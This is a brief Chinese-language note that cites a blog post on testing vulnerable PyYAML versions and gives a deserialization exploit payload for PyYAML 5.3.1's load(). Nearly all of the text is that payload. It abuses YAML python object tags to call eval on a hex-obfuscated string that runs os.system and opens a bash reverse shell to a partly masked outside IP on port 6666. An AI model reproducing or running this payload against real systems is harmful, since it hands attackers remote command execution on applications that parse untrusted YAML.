里面有个不错的exp

r2c blog — Fully loaded: testing vulnerable PyYAML versions

5.3.1 load可杀：

!!python/object/new:tuple
- !!python/object/new:map
  - !!python/name:eval
  - [ "\\x5f\\x5fimport\\x5f\\x5f('\\x6fs')\\x2esystem('bash -c \\"bash -i >& /dev/tcp/43\\x2exx\\x2exx\\x2exx/6666 0>&1\\"')" ]